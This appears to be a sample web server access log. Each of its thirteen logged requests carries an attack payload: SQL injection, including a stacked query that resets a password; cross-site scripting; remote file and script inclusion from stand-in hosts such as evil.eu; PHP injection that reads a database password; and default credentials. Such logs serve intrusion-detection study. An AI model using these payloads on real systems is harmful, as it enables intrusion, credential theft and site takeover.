"GET /login.php/?id=0%20or%201=1 HTTP/1.0" 404 53109
"GET /core/files/js/upload.js/?id=0%20or%201=1 HTTP/1.0" 200 19261
"GET /login.php/?userid=bob%27%3b%20update%20logintable%20set%20passwd%3d%270wn3d%27%3b--%00 HTTP/1.0" 404 67918
"GET /?id=0%20or%201=1 HTTP/1.0" 403 75722
"GET /index.php/?post=%3script%3ealert(1); HTTP/1.0" 200 9672
"GET /index.php/?post=%3script%3ealert(1); HTTP/1.0" 200 49535
"GET /core/themes/theme.inc/?data=%3cscript%20src=%22http%3a%2f%2fwww.hacckingplace.com%2fnasty.js%22%3e%3c%2fscript%3e HTTP/1.1" 403 84586
"GET /core/files/js/editor.js/?username=admin&password=admin2 HTTP/1.0" 404 8714
"GET /?post=%3script%3ealert(1); HTTP/1.1" 200 35060
"GET /connection.php/?file=http://evil.eu/sh HTTP/1.0" 200 62971
"GET /register.php/?post==<?php print $settings[database][password]; ?> HTTP/1.0" 200 84471
"GET /?file=http://evil.eu/root.asp HTTP/1.0" 400 65185
"GET /orders.php/?cmd=pwd&page=http://hackersite.com/dsfsdasfsd.php HTTP/1.0" 200 56707
